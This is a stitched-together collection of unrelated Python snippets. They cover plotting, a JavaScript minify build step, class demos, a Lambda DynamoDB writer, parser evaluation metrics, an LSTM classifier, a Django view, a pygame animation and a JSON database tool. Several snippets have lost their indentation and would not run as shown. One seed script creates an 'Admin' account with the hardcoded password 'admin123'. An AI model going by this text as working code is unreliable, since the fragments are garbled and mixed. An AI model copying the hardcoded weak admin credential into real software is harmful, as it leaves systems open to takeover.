ax2.bar(x-baroffset, h, width=barwidth, alpha=alpha, hatch=hatch, color=col, edgecolor=ec, fill=fill, label=fn)
if ylim:
ylim = max(np.max(h[:i99]), ylim)
else:
ylim = np.max(h[:i99])
xlim = max(xlim, i99)
ax2.set_ylim([0, ylim])
ax1.vlines(i05, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax2.vlines(i05, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax1.vlines(i95, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax2.vlines(i95, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax1.set_ylim([0, 1.0])
ax1.set_xlim([0, xlim])
ax1.set_ylabel("CDF[n_reads(DP)]")
ax2.set_ylabel("H")
ax2.set_xlabel("DP")
ax1.legend(loc="lower right")
plt.tight_layout()
pdf.savefig()
pdf.close()
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
class obere(object):
    """Base-class demo: class attribute `a` shadowed by an instance attribute."""
    a = 15  # class-level fallback, visible again after delete()

    def __init__(self):
        self.zahl = 42
        self.a = 4

    def fun(self):
        return 17

    def show(self):
        print(self.a)

    def delete(self):
        # Removes only the instance attribute; lookups then fall back to the
        # class attribute.
        del self.a

    def arit(self):
        self.a += 4
class untere(obere):
    """Subclass demo of obere."""
    def __init__(self):
        # Bug fix: initialize the base class too, so inherited instance
        # attributes (zahl, a) exist on untere instances as well; the
        # original skipped this and untere().zahl raised AttributeError.
        super().__init__()
        self.nummer = 21
    def fun(self):
        # Explicitly delegates to the base implementation (returns 17).
        return super().fun()
# Demo of attribute shadowing: prints 4 (instance attr), then 15 (class attr
# after the instance attr is deleted), then 19 (15 + 4 rebound on the instance).
o = obere()
o.show()
o.delete()
o.show()
o.arit()
o.show()
from __future__ import with_statement
from builderror import BuildError
from shermanfeature import ShermanFeature
import codecs
import os
import re
import subprocess
class Feature(ShermanFeature):
    """Sherman build feature (Python 2): minify each module's concatenated
    JavaScript with the Closure Compiler after source concatenation."""
    @ShermanFeature.priority(90)
    def sourcesConcatenated(self, locale, moduleName, modulePath):
        """Replace the module's "__concat__" JS with its minified form.

        Writes the JS to a temp file, shells out to the Closure Compiler jar,
        and raises BuildError when the compiler exits non-zero.
        """
        print " Minifying JavaScript..."
        module = self.currentBuild.files[locale][moduleName]
        js = module["__concat__"]
        js = self.preMinifyTricks(js)
        tempPath = self.projectBuilder.buildDir + "/" + moduleName + ".js"
        with codecs.open(tempPath, "w", "utf-8") as f:
            f.write(js)
        p = subprocess.Popen("java -jar %s/other/closure-compiler/compiler.jar --js %s --jscomp_off nonStandardJsDocs" %
                             (self.shermanDir, tempPath), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
        js = ""
        err = ""
        # Drain stdout/stderr until the compiler process exits.
        while p.poll() == None:
            (stdoutdata, stderrdata) = p.communicate()
            js += stdoutdata
            err += stderrdata
        if p.returncode == 0:
            # Success: the temp input file is no longer needed.
            os.remove(tempPath)
        else:
            raise BuildError("Minification of module %s failed: %s" % (moduleName, err))
        module["__concat__"] = js
    def preMinifyTricks(self, js):
        """Alias long framework globals (Application, Modules, Tiles,
        UserAgent) to one-letter names before minification so the compiled
        output is smaller."""
        js = re.compile(r"((\w+\.)?)(?<!\w)Application *=", flags = re.MULTILINE).sub(r"\1A = \1Application =", js)
        js = re.compile(r"(?<!\w)Application\.", flags = re.MULTILINE).sub("A.", js)
        js = re.compile(r"((\w+\.)?)(?<!\w)Modules *=", flags = re.MULTILINE).sub(r"\1M = \1Modules =", js)
        js = re.compile(r"(?<!\w)Modules\.", flags = re.MULTILINE).sub("M.", js)
        js = re.compile(r"((\w+\.)?)(?<!\w)Tiles *=", flags = re.MULTILINE).sub(r"\1T = \1Tiles =", js)
        # Frequently-called Tiles methods get their own short aliases.
        js = re.compile(r"(?<!\w)Tiles\.showTileInContainer", flags = re.MULTILINE).sub("T.c", js)
        js = re.compile(r"(?<!\w)Tiles\.showTile", flags = re.MULTILINE).sub("T.s", js)
        js = re.compile(r"(?<!\w)Tiles\.pushModalTile", flags = re.MULTILINE).sub("T.m", js)
        js = re.compile(r"(?<!\w)Tiles\.", flags = re.MULTILINE).sub("T.", js)
        js = re.compile(r"((\w+\.)?)(?<!\w)UserAgent *=", flags = re.MULTILINE).sub(r"\1U = \1UserAgent =", js)
        js = re.compile(r"(?<!\w)UserAgent\.", flags = re.MULTILINE).sub("U.", js)
        return js
|
# One-off script: seed the database with a default admin account.
from run import db, User
username = "Admin"
# NOTE(review): the password is passed through as-is; confirm User hashes it,
# otherwise this persists a plaintext credential.
password = "admin123"
level = "Admin"
db.session.add(User(username,password,level))
db.session.commit()
class ExceptionSignalsBinder:
    """Wires warning/exception Qt signals between views and the handler.

    On construction, connects:
      * the exception handler's show/hide dialog signals to the about-view,
      * the warning dialog's `accepted` signal to the handler's fix() and to
        hiding the warning message,
      * each producer's `occured_warning` signal to the exception handler.
    """
    def __init__(self,exception_handler,choose_posts,post_to_group,edit_post,liable_about_view,warning_message,vk_operator):
        self.__warning_message = warning_message
        self.__exception_handler = exception_handler
        self.__liable_about_view = liable_about_view
        self.__post_to_group = post_to_group
        self.__edit_post = edit_post
        self.__choose_post = choose_posts
        self.__vk_operator = vk_operator
        # All connections are made eagerly at construction time.
        self.snapping_signals()
        self.snapping_post_to_group_signals()
        self.snapping_choose_post_signals()
        self.snapping_edit_post_signals()
        self.snapping_vk_opearator_signals()
    def snapping_signals(self):
        """Connect handler dialog signals and the dialog's accept button."""
        self.__exception_handler.show_warning_dialog.connect(
            self.__liable_about_view.show_warning_message)
        self.__exception_handler.hide_warning_dialog.connect(
            self.__liable_about_view.hide_warning_message)
        self.__warning_message.accepted.connect(self.__exception_handler.fix)
        self.__warning_message.accepted.connect(self.__liable_about_view.hide_warning_message)
    def snapping_post_to_group_signals(self):
        """Route post_to_group warnings to the exception handler."""
        self.__post_to_group.occured_warning.connect(self.__exception_handler.handle_warning)
    def snapping_choose_post_signals(self):
        """Route choose_post warnings to the exception handler."""
        self.__choose_post.occured_warning.connect(self.__exception_handler.handle_warning)
    def snapping_edit_post_signals(self):
        """Route edit_post warnings to the exception handler."""
        self.__edit_post.occured_warning.connect(self.__exception_handler.handle_warning)
    def snapping_vk_opearator_signals(self):
        """Route VK operator warnings to the exception handler."""
        self.__vk_operator.occured_warning.connect(self.__exception_handler.handle_warning)
import salem
from salem.utils import get_demo_file
import xarray as xr
import matplotlib.pyplot as plt
import pdb
import numpy as np
from functools import partial
from salem import get_demo_file, open_xr_dataset, GeoTiff, wgs84
# Plot sub-grid roughness (std-dev) of 1-arcmin GTOPO elevation aggregated onto
# a coarse grid (factor 0.03), with river/lake centerlines overlaid.
dat = xr.open_dataarray('/users/global/cornkle/data/pythonWorkspace/proj_CEH/topo/gtopo_1min.nc')
#dat=dat.sel(lon=slice(-18,120), lat=slice(-30,60))
#dat=dat.sel(lon=slice(-100,-40), lat=slice(-30,60))
grid = dat.salem.grid
grid50 = grid.regrid(factor=0.03)
lakes = salem.read_shapefile(salem.get_demo_file('ne_50m_rivers_lake_centerlines.shp'), cached=True)
# Std-dev of the fine cells that fall inside each coarse cell.
top_on_grid50 = grid50.lookup_transform(dat, method=np.std)
sm = dat.salem.get_map(cmap='topo')
# NOTE(review): the shapefile is read a second time here -- the `lakes`
# already loaded above could be reused.
lakes = salem.read_shapefile(salem.get_demo_file('ne_50m_rivers_lake_centerlines.shp'), cached=True)
sm.set_shapefile(lakes, edgecolor='k', facecolor='none', linewidth=2,)
mask_lakes = grid.region_of_interest(shape=lakes)  # NOTE(review): unused
sm.set_data(top_on_grid50, grid50)
sm.set_plot_params(vmin=20, vmax=500)
#sm.set_data(dat, grid)
sm.visualize()
# Second figure: the raw topography itself.
f = plt.figure()
sm.set_data(dat, grid)
sm.set_plot_params(vmax=1000)
sm.visualize()
print("Welcome to the Shipping Accounts Program\n")
ls = ["john","mike","jasmine","george","kelvin"]
name = input("Hello, what is your username: ").lower()
if name in ls:
print("Hello {}. Welcome back to your account.".format(name))
print("Current shipping prices are as follows:")
print("Shipping orders 0 to 100: $5.10 each")
print("Shipping orders 100 to 500: $5.00 each")
print("Shipping orders 500 to 1000: $4.95 each")
print("Shipping orders over 1000: $4.80 each")
item_ship = int(input("How many items would you like to ship: "))
if item_ship < 100:
a = 5.10
elif item_ship < 500:
a = 5.00
elif item_ship < 1000:
a = 4.95
else:
a = 4.80
cost_of_shipping = item_ship*a
cost_of_shipping = round(cost_of_shipping,2)
print("To ship {} items it will cost you {} at {} per item".format(item_ship, cost_of_shipping,a))
j = input("Would you like to place this order (y/n): ")
if j.startswith('y'):
print("Okay. Shipping your {} items.".format(item_ship))
else:
print("No order has been placed")
else:
print("Sorry, you do not have an account with us. Goodbye.")
|
# Bradley Aiken
# roster_fields.py
# used with cs176roster.webadvisor.txt
# reformat student information from read file
old_roster = open("cs176roster.webadvisor.txt", "r")
new_roster = open("roster.txt", "w")
# 0: name, 1: id, 2: email, 3: major, 4: year, 5: adviser, 6: credits
count = 0
for line in old_roster.readlines():
line = line.rstrip()
if count == 0: # name
print(line, end='', file=new_roster)
elif count == 1: # id
print(',', line, file=new_roster)
count += 1
count %= 8
|
from mininet_test.test_monitor import TestMonitor
from mininet_test.test_monitor_host import TestMonitorHost
|
"""
Read file into texts and calls.
It's ok if you don't understand how to read files.
"""
import csv
# Rows are [incoming, answering, time(, seconds)] -- see the Textline class
# below; calls.csv carries the extra duration column.
with open('texts.csv', 'r') as f:
    reader = csv.reader(f)
    texts = list(reader)
with open('calls.csv', 'r') as f:
    reader = csv.reader(f)
    calls = list(reader)
"""
TASK 0:
What is the first record of texts and what is the last record of calls?
Print messages:
"First record of texts, <incoming number> texts <answering number> at time <time>"
"Last record of calls, <incoming number> calls <answering number> at time <time>, lasting <during> seconds"
"""
class Textline:
    """One record from texts.csv or calls.csv.

    Attributes: incoming number, answering number, timestamp, and -- only for
    4-field call records -- the duration in `seconds`.
    """
    def __init__(self, record):
        # Idiom fix: the parameter was named `list`, shadowing the builtin.
        self.incoming = record[0]
        self.answering = record[1]
        self.time = record[2]
        if len(record) > 3:
            self.seconds = record[3]
# Task 0 output: describe the first text record and the last call record.
first_record = Textline(texts[0])
last_record = Textline(calls[-1])
print("First record of texts, "+first_record.incoming + " texts " +
      first_record.answering + " at time "+first_record.time)
print("Last record of calls, "+last_record.incoming + " calls "+last_record.answering +
      " at time "+last_record.time+", lasting " + last_record.seconds+" seconds")
import boto3
def lambda_handler(event, context):
    """AWS Lambda entry point: bulk-insert three fixed users into DynamoDB.

    Uses the `Users` table's batch_writer so the put_item calls are flushed
    as batched writes. `event` and `context` are unused.
    """
    db = boto3.resource('dynamodb')
    table = db.Table('Users')
    with table.batch_writer() as batch:
        batch.put_item(
            Item={
                'id': 1,
                'name': 'parwiz',
                'age': '20'
            }
        )
        batch.put_item(
            Item={
                'id': 2,
                'name': 'john',
                'age': '20'
            }
        )
        batch.put_item(
            Item={
                'id': 3,
                'name': 'abc',
                'age': '37'
            }
        )
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Parser evaluation utils."""
from __future__ import division
import tensorflow as tf
from syntaxnet import sentence_pb2
from syntaxnet.util import check
def calculate_parse_metrics(gold_corpus, annotated_corpus):
  """Calculate POS/UAS/LAS accuracy based on gold and annotated sentences.

  Args:
    gold_corpus: list of serialized gold Sentence protos.
    annotated_corpus: list of serialized annotated Sentence protos, aligned
      with gold_corpus.

  Returns:
    Tuple (pos, uas, las) of accuracies as percentages.
  """
  check.Eq(len(gold_corpus), len(annotated_corpus), 'Corpora are not aligned')
  num_tokens = 0
  num_correct_pos = 0
  num_correct_uas = 0
  num_correct_las = 0
  for gold_str, annotated_str in zip(gold_corpus, annotated_corpus):
    gold = sentence_pb2.Sentence()
    annotated = sentence_pb2.Sentence()
    gold.ParseFromString(gold_str)
    annotated.ParseFromString(annotated_str)
    check.Eq(gold.text, annotated.text, 'Text is not aligned')
    check.Eq(len(gold.token), len(annotated.token), 'Tokens are not aligned')
    # Bug fix: under Python 3, zip() returns a single-use iterator, so the
    # original code's len() call would raise and the three sums would see an
    # exhausted stream; materialize the pairs once.
    tokens = list(zip(gold.token, annotated.token))
    num_tokens += len(tokens)
    num_correct_pos += sum(1 for x, y in tokens if x.tag == y.tag)
    num_correct_uas += sum(1 for x, y in tokens if x.head == y.head)
    num_correct_las += sum(1 for x, y in tokens
                           if x.head == y.head and x.label == y.label)
  tf.logging.info('Total num documents: %d', len(annotated_corpus))
  tf.logging.info('Total num tokens: %d', num_tokens)
  pos = num_correct_pos * 100.0 / num_tokens
  uas = num_correct_uas * 100.0 / num_tokens
  las = num_correct_las * 100.0 / num_tokens
  tf.logging.info('POS: %.2f%%', pos)
  tf.logging.info('UAS: %.2f%%', uas)
  tf.logging.info('LAS: %.2f%%', las)
  return pos, uas, las
def parser_summaries(gold_corpus, annotated_corpus):
  """Computes parser evaluation summaries for gold and annotated sentences."""
  pos, uas, las = calculate_parse_metrics(gold_corpus, annotated_corpus)
  summaries = {'POS': pos, 'UAS': uas, 'LAS': las}
  # LAS doubles as the overall evaluation metric.
  summaries['eval_metric'] = las
  return summaries
def calculate_segmentation_metrics(gold_corpus, annotated_corpus):
  """Calculate precision/recall/f1 based on gold and annotated sentences.

  Tokens are compared solely by their (start, end) character spans: a
  predicted token is correct iff an identical span exists in the gold
  sentence. Returns (precision, recall, f1) rounded to 2 decimals.
  """
  check.Eq(len(gold_corpus), len(annotated_corpus), 'Corpora are not aligned')
  num_gold_tokens = 0
  num_test_tokens = 0
  num_correct_tokens = 0
  def token_span(token):
    # A token's identity for matching purposes is its character span.
    check.Ge(token.end, token.start)
    return (token.start, token.end)
  def ratio(numerator, denominator):
    # Division that defines 0/0 as 0 and x/0 as +inf instead of raising.
    check.Ge(numerator, 0)
    check.Ge(denominator, 0)
    if denominator > 0:
      return numerator / denominator
    elif numerator == 0:
      return 0.0  # map 0/0 to 0
    else:
      return float('inf')  # map x/0 to inf
  for gold_str, annotated_str in zip(gold_corpus, annotated_corpus):
    gold = sentence_pb2.Sentence()
    annotated = sentence_pb2.Sentence()
    gold.ParseFromString(gold_str)
    annotated.ParseFromString(annotated_str)
    check.Eq(gold.text, annotated.text, 'Text is not aligned')
    gold_spans = set()
    test_spans = set()
    for token in gold.token:
      check.NotIn(token_span(token), gold_spans, 'Duplicate token')
      gold_spans.add(token_span(token))
    for token in annotated.token:
      check.NotIn(token_span(token), test_spans, 'Duplicate token')
      test_spans.add(token_span(token))
    num_gold_tokens += len(gold_spans)
    num_test_tokens += len(test_spans)
    num_correct_tokens += len(gold_spans.intersection(test_spans))
  tf.logging.info('Total num documents: %d', len(annotated_corpus))
  tf.logging.info('Total gold tokens: %d', num_gold_tokens)
  tf.logging.info('Total test tokens: %d', num_test_tokens)
  precision = 100 * ratio(num_correct_tokens, num_test_tokens)
  recall = 100 * ratio(num_correct_tokens, num_gold_tokens)
  f1 = ratio(2 * precision * recall, precision + recall)
  tf.logging.info('Precision: %.2f%%', precision)
  tf.logging.info('Recall: %.2f%%', recall)
  tf.logging.info('F1: %.2f%%', f1)
  return round(precision, 2), round(recall, 2), round(f1, 2)
def segmentation_summaries(gold_corpus, annotated_corpus):
  """Computes segmentation eval summaries for gold and annotated sentences."""
  precision, recall, f1_score = calculate_segmentation_metrics(
      gold_corpus, annotated_corpus)
  # F1 doubles as the overall evaluation metric.
  return {
      'precision': precision,
      'recall': recall,
      'f1': f1_score,
      'eval_metric': f1_score,
  }
|
from torch import nn
import torch
import numpy as np
class TextLSTM(nn.Module):
    """
    LSTM model for text classification.

    Embedding -> single-layer unidirectional LSTM -> 2-layer MLP head; the
    classification uses the LSTM output at the final timestep. Softmax is
    intentionally omitted so the head emits raw logits.
    """
    def __init__(self, opt):
        # nn.Module must be initialized before registering submodules.
        super(TextLSTM, self).__init__()
        self.name = "TextLstm"
        self.opt = opt
        self.embedding = nn.Embedding(opt.vocab_size, opt.embed_dim)
        self.lstm = nn.LSTM(input_size=opt.embed_dim,
                            hidden_size=opt.hidden_size,
                            num_layers=1,
                            batch_first=True,
                            bidirectional=False)
        self.linears = nn.Sequential(
            nn.Linear(opt.hidden_size, opt.linear_hidden_size),
            nn.ReLU(),
            nn.Dropout(0.25),
            nn.Linear(opt.linear_hidden_size, opt.num_classes),
            # nn.Softmax()
        )
        # Optionally warm-start the embedding table from a saved numpy array.
        if opt.embedding_path:
            self.embedding.weight.data.copy_(torch.from_numpy(np.load(opt.embedding_path)))
            # self.embedding.weight.requires_grad = False
    def forward(self, x):
        """x: LongTensor of token ids, (batch, seq_len) -> logits (batch, num_classes)."""
        x = self.embedding(x)
        # Bug fix: removed the leftover Python 2 debug statement `print x`,
        # which is a SyntaxError under Python 3.
        lstm_out, _ = self.lstm(x)
        # Classify from the hidden state of the last timestep.
        out = self.linears(lstm_out[:, -1, :])
        return out
|
from django.http import HttpResponse
from django.shortcuts import render
import datetime
# Create your views here.
def date_time_view(request):
    """Return a simple HTML page showing the server's current date and time.

    NOTE: uses naive local server time (no timezone handling).
    """
    # BUG FIX: removed the stray, unused `retun=None` parameter (a typo
    # artifact) and corrected "Data" -> "Date" in the page text.
    date = datetime.datetime.now()
    s = '<h1> The current Date And Time at server is :' + str(date) + '</h1>'
    return HttpResponse(s)
import pygame
from math import sin, cos
from random import randint
SCREEN_WIDTH, SCREEN_HEIGHT = 650, 650  # window size in pixels
FPS = 850  # frame pacing: the main loop waits 1000 // FPS ms per frame
BACKGROUND = [ 0 ] * 3  # RGB black; used to erase old tail points
# --- Core ---------------------------------------------------------
class FuncDrawer:
    """Animates a parametric curve (x_func(t), y_func(t)) on a pygame
    surface, keeping at most `tail` points visible at once.

    The curve's bounding box over [t_begin, t_end] is pre-scanned so that
    points can be uniformly scaled to fit the surface.
    """

    def __init__(self, x_func, y_func, t_begin, t_end, t_step=0.1, tail=100):
        self._x_func = x_func
        self._y_func = y_func
        self._t_begin = t_begin
        self._t_end = t_end
        self._t_step = t_step
        self._tail = tail  # max points kept before the oldest is erased
        self._points = [ ]  # screen coords of currently drawn points
        self._current_t = self._t_begin
        self._prepare()

    def _prepare(self):
        """Scan [t_begin, t_end] once to find the curve's bounding box."""
        x_max, y_max = x_min, y_min = self._calc(self._t_begin)
        t = self._t_begin + self._t_step
        while t <= self._t_end:
            curr_x, curr_y = self._calc(t)
            if curr_x < x_min:
                x_min = curr_x
            if curr_x > x_max:
                x_max = curr_x
            if curr_y < y_min:
                y_min = curr_y
            if curr_y > y_max:
                y_max = curr_y
            t += self._t_step
        self._x_min = x_min
        self._y_min = y_min
        self._x_max = x_max
        self._y_max = y_max

    def _calc(self, t):
        """Evaluate the parametric pair at t."""
        return self._x_func(t), self._y_func(t)

    def _draw(self, screen, t, color, size):
        """Draw the point for parameter t scaled onto `screen`; returns its
        screen coordinates as [x, y]."""
        width, height = screen.get_size()
        # NOTE(review): a constant x or y function makes the range zero and
        # would divide by zero here -- confirm inputs are non-degenerate.
        x_zoom = width / (self._x_max - self._x_min)
        y_zoom = height / (self._y_max - self._y_min)
        zoom = min(x_zoom, y_zoom)
        x = int((self._x_func(t) - self._x_min) * zoom)
        y = int((self._y_func(t) - self._y_min) * zoom)
        pygame.draw.circle(screen, color, (x, y), size)
        return [ x, y ]

    def draw_next(self, screen, color, size):
        """Draw the next point; erase the oldest once the tail is full."""
        self._points.append(self._draw(screen, self._current_t, color, size))
        if len(self._points) > self._tail:
            # BUG FIX: erase on the surface that was passed in, not the
            # module-level `animation_screen` global.
            pygame.draw.circle(screen, BACKGROUND, self._points[0], size)
            del self._points[0]
        self._current_t += self._t_step
def get_rand_color():
    """Return a random RGB tuple with each channel in 1..255."""
    return tuple(randint(1, 255) for _ in range(3))
def sign(t):
    """Return 1, -1 or 0 matching the sign of t."""
    # bool arithmetic: True - False == 1, False - True == -1, equal -> 0.
    return (t > 0) - (t < 0)
# --- Main program -------------------------------------------------
def f1(t):
    """Curve coordinate source: amplitude-8 product of two cosines."""
    slow = cos(t / 10 + 1)
    fast = cos(0.5 * t - 15)
    return 8 * slow * fast
def f2(t):
    """Curve coordinate source: amplitude-8 cosine/cosine/sine product."""
    a = cos(1.1 * t + 1)
    b = cos(t / 2)
    c = sin(t / 100 + 15)
    return 8 * a * b * c
pygame.init()
animation_screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
animation_screen.set_alpha(255)
# Drawing parameters: dot radius and the t range/step for the curves.
size = 2
t_step = 0.01
t_begin = 0
t_end = 1e4
# fd3 = FuncDrawer(lambda t: sin(t) ** 1, lambda t: cos(t) ** 1, 0, 3.15 * 2, 750)
# Two curves with swapped axes (f1/f2 and f2/f1) plus a rounded-square curve.
fd1 = FuncDrawer(f1, f2, t_begin, t_end, t_step, 850)
fd2 = FuncDrawer(f2, f1, t_begin, t_end, t_step, 850)
fd3 = FuncDrawer(lambda t: abs(cos(t)) ** 0.5 * sign(cos(t)), lambda t: abs(sin(t)) ** 0.5 * sign(sin(t)), 0, 7, t_step / 4, 630)
points = [ ]  # NOTE(review): unused -- confirm it can be removed
t = t_begin
done = False
# Main loop: advance each curve by one point per frame until the window closes.
while not done:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            done = True
    fd1.draw_next(animation_screen, (255, 0, 0), size)
    fd2.draw_next(animation_screen, (0, 255, 0), size)
    fd3.draw_next(animation_screen, (0, 0, 255), size)
    pygame.display.flip()
    pygame.time.wait(1000 // FPS)
pygame.quit()
#!/usr/bin/python
# ADB.py
#
# Functions to manage an AWARE database dictionary
#
# This file is used to merge a heirarchy of json files used to track AWARE
# Imaging System.
#
# Developed by: Steve Feller on 11/8/2012
# Release Date:
# versions: 0.1
#
# Functions:
# generate(path) - function to generate a dictionary of
# the json data using the given path as
# the root.
# writeDict(dest) - function to write the current dictionary
# to the specified file
# query(key) - function to get a list of all values for the given key
# findKeys(value) - function to find a key that matches a given value
#
# genDict(path) - recursive function that step through
# subdirectories of the given path and
# aggregates data into a single dictionary
# that is returned.
# findKeys - recursive function to find keys for a given value
# stringList(dbase) - iterative generate a list of strings for each value
# for each value in a dictionary.
#
# Proposed functions:
# writeDB - exports current dictionary to the the JSON file heirarchy
#
# Notes:
# - need to add wildcard support to lookup functions (query, findkeys)
############################################################
import os
import argparse
import json
import datetime
#custom files
import AJSON
#import Adict
############################################################
# Global variables
############################################################
VERBOSE = 0  # Debug level: 0 = quiet, 1 = verbose (-v), 2 = very verbose (-vv)
############################################################
# stringList( dbase)
#
# Function to generate a list of strings that show all fields
# in a database.
############################################################
def stringList(dbase):
    """Flatten a nested dictionary into a list of "path:value" strings.

    Nested keys are joined with '/', e.g. {'a': {'b': 'c'}} -> ['a/b:c'].
    """
    files = list()
    # Walk every key; recurse into sub-dictionaries, emit leaves directly.
    # BUG FIX: dict.iteritems() is Python 2 only; use items().
    for k, v in dbase.items():
        if type(v) is dict:
            for f in stringList(v):
                files.append(k + "/" + f)
        else:
            files.append(str(k) + ":" + v)
    return files
############################################################
# genKeys
#
# Function that recursively walks through dictionary and
# returns keys the given value
#
# Inputs:
# dbase - database to query (local to function to be iterative)
# val - value to query on
#
# Returns:
# result - dictionary of all subsequent instances of value
############################################################
def findKeys(dbase, val):
    """Recursively collect entries of dbase whose value equals val.

    Returns a nested dict mirroring dbase's structure, containing only the
    branches that lead to a matching value.
    """
    # Fall back to 0 when the module-level debug flag is absent so the
    # function also works when imported standalone.
    verbose = globals().get('VERBOSE', 0)
    result = {}
    # For each dictionary element, see if it has children.
    # BUG FIX: dict.iteritems() is Python 2 only; use items().
    for k, v in dbase.items():
        if verbose > 1:
            print("ADB.findKeys: Key: ", k, " Value:", v)
        # Recurse into sub-dictionaries; keep the branch only if it matched.
        if type(v) is dict:
            value = findKeys(v, val)
            if len(value) > 0:
                result[k] = value
        if v == val:
            result[k] = v
        if verbose > 1:
            print("ADB.findKeys:result: ", result, " found", v, " key:", k)
    return result
############################################################
# query
#
# Function that recursively walks through dictionary and
# returns sub values that contain the given key
#
# Inputs:
# ldbase - database to query (local to function to be iterative)
# key - key to query on
#
# Returns:
# result - dictionary of all subsequent instances of value
#
# Notes: Eventually should include wildcards lookup options
#
############################################################
def query(dbase, key):
    """Recursively collect entries of dbase stored under the given key.

    Returns a nested dict mirroring dbase's structure, containing only the
    branches that lead to a matching key.

    Note: wildcard lookup is a proposed future extension (see file header).
    """
    # Fall back to 0 when the module-level debug flag is absent so the
    # function also works when imported standalone.
    verbose = globals().get('VERBOSE', 0)
    result = {}
    # For each dictionary element, see if it has children.
    # BUG FIX: dict.iteritems() is Python 2 only; use items().
    for k, v in dbase.items():
        if verbose > 1:
            print("ADB.query: key: ", k, " Value:", v)
        # Recurse into sub-dictionaries; keep the branch only if it matched.
        if type(v) is dict:
            value = query(v, key)
            if len(value) > 0:
                result[k] = value
        if k == key:
            result[k] = v
        if verbose > 1:
            print("ADB.query:result: ", result, " found", k, " Value:", v)
    return result
############################################################
# generate
#
# External call to generate a dictionary from the specified
# root level path. Adds date/time header information to
# toplevel of dictionary
#
# Inputs:
# path - base directory to generate database from
#
# Returns:
# dbase - resulting database
############################################################
def generate(path):
    """Generate a dictionary from the json hierarchy rooted at path.

    Adds a timestamp-derived unique "id" plus "date"/"time" headers, then
    attaches genDict()'s data under the root directory's base name.
    """
    dbase = {}
    global VERBOSE
    # get current time
    dt = datetime.datetime.now()
    # Unique ID from the timestamp plus microseconds.
    # BUG FIX: the original used %m (month) where minutes (%M) were intended.
    dbase["id"] = dt.strftime("%Y%m%d%H%M%S") + str(dt.microsecond)
    dbase["date"] = dt.strftime("%Y-%m-%d")
    # BUG FIX: %H:%M.%S -- the original wrote the month in the minute slot.
    dbase["time"] = dt.strftime("%H:%M.%S")
    # Root key is the base name of the path (tolerate a trailing slash).
    if path[-1] == '/':
        dirname = os.path.basename(path[:-1])
    else:
        dirname = os.path.basename(path)
    ret = genDict(dbase, path)
    if ret["rc"] == 1:
        dbase[dirname] = ret["data"]
    if VERBOSE > 1:
        print("ADB.generate dbase:", dbase)
    return dbase
############################################################
# genDict
#
# Function that recursively generates a single dictionary from
# JSON files starting at the specified root level. This allows
# the creation of dictionaries that reference a subset of the
# database
#
# Inputs:
# path - directory path to start generating data
#
# Returns (dictionary):
# "rc" - return code
# 1 = success
# 0 = directoy does not have json file
# "data" - dictionary of data from current and sub directories
############################################################
def genDict(dbase, path):
    """Recursively build a dictionary from per-directory json files.

    Reads path/<basename>.json, then walks the immediate subdirectories and
    attaches each child's data under its directory name.

    Returns {"rc": 1, "data": {...}} on success, or {"rc": 0, "data": {}}
    when the directory has no readable json file (recursion stops there).
    """
    # Derive the directory's base name, tolerating a trailing slash.
    if path[-1] == '/':
        dirname = os.path.basename(path[:-1])
    else:
        dirname = os.path.basename(path)
    path = path + '/'
    # The directory's own json file is named after the directory itself.
    jname = path + dirname + '.json'
    if VERBOSE > 1:
        print("Jname:", jname)
    retval = AJSON.readJson(jname)
    if VERBOSE > 1:
        print("Name:", jname, " =>", retval)
    if retval["rc"] == 1:
        node = retval["data"]
    else:
        # BUG FIX: return an int rc; the success path and callers compare
        # against the int 1 (the original returned the string "0").
        return {"rc": 0, "data": {}}
    # Recurse into immediate subdirectories.
    # BUG FIX: generator.next() is Python 2 only; use the builtin next().
    pathList = next(os.walk(path))[1]
    if VERBOSE > 1:
        print("Pathlist: ", pathList)
    for child in pathList:
        cpath = path + child
        # (The original called cpath.strip() and discarded the result -- a
        # no-op, removed.)
        if VERBOSE > 1:
            print("ChildPath: ", cpath)
        db = genDict(dbase, cpath)
        node[child] = db["data"]
    return {"rc": 1, "data": node}
############################################################
# writeDict
#
# Function to write out the dictionary to a specified file.
#
# Inputs:
# path - directory path to start generating data
#
# Returns (dictionary):
# "rc" - return code matches AJSON.writeJson
############################################################
def writeDict(dbase, dest):
    """Write the dictionary to dest as JSON; returns AJSON.writeJson's rc."""
    return AJSON.writeJson(dest, dbase, True)
def main():
    """Command-line entry point: build the dictionary from the given path,
    then run the requested query / key lookup / printing / writing."""
    global VERBOSE
    # parse command line arguments
    parser = argparse.ArgumentParser(description='AWARE Database Script')
    parser.add_argument('-v', action='store_const', dest='VERBOSE', const='True', help='VERBOSE output')
    parser.add_argument('-vv', action='store_const', dest='VERBOSE2', const='True', help='VERBOSE output')
    parser.add_argument('-q', action='store', dest='query', help='find values for specified key')
    parser.add_argument('-k', action='store', dest='qval', help='find keys for specified value')
    parser.add_argument('-p', action='store_const', dest='printout', const='True', help='print contents of JSON file')
    # parser.add_argument('-no-force', action='store_const', dest='noforce', const='True', help='force write JSON file')
    parser.add_argument('-w', action='store_const', dest='write', const='True', help='write JSON file')
    parser.add_argument('-o', action='store', dest='outfile', help='output file')
    parser.add_argument('filename', nargs='+', help='filename')
    args = parser.parse_args()
    # -v / -vv set the module-wide debug level.
    # NOTE(review): args.write is parsed but never used below -- confirm.
    if args.VERBOSE:
        VERBOSE = 1
    if args.VERBOSE2:
        VERBOSE = 2
    # Build the dictionary from the first positional path argument.
    dbase = generate(args.filename[0])
    if args.printout:
        print(json.dumps(dbase, indent=4, sort_keys=True))
    # -q: look up all values stored under the given key.
    if args.query:
        print("Query: ", args.query)
        res = query(dbase, args.query)
        AJSON.printJson(res)
